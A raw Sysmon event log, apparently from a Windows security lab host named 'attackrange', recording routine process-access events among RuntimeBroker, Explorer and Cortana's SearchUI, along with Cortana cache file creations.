13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+170f34|C:\Windows\System32\Windows.Storage.dll+1411fc|C:\Windows\System32\Windows.Storage.dll+140e39|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bc4b|C:\Windows\System32\Windows.Storage.dll+12db23|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000013050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bbe8|C:\Windows\System32\Windows.Storage.dll+12db04|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000013049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12cd6b|C:\Windows\System32\Windows.Storage.dll+12c245|C:\Windows\System32\Windows.Storage.dll+12c022|C:\Windows\System32\Windows.Storage.dll+12f28a|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000013048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60e40|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+5fb52|C:\Windows\System32\Windows.Storage.dll+60148|C:\Windows\System32\Windows.Storage.dll+19f723|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000013045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+19f828|C:\Windows\System32\Windows.Storage.dll+19f709|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x800000000000000013043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.804{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75df8f4e-2230-4373-8b17-a6e5861be9ea}\0.2.filtertrie.intermediate.txt2021-01-18 13:58:36.804 11241100x800000000000000013042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.804{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75df8f4e-2230-4373-8b17-a6e5861be9ea}\0.1.filtertrie.intermediate.txt2021-01-18 13:58:36.804 11241100x800000000000000013041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.804{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75df8f4e-2230-4373-8b17-a6e5861be9ea}\0.0.filtertrie.intermediate.txt2021-01-18 13:58:36.804 11241100x800000000000000013040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.773{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appssynonyms.txt2016-04-15 08:09:24.000 10341000x800000000000000013039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.726{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000013038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.726{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.711{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132554519165906401.txt2021-01-18 13:58:36.711 10341000x800000000000000013036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
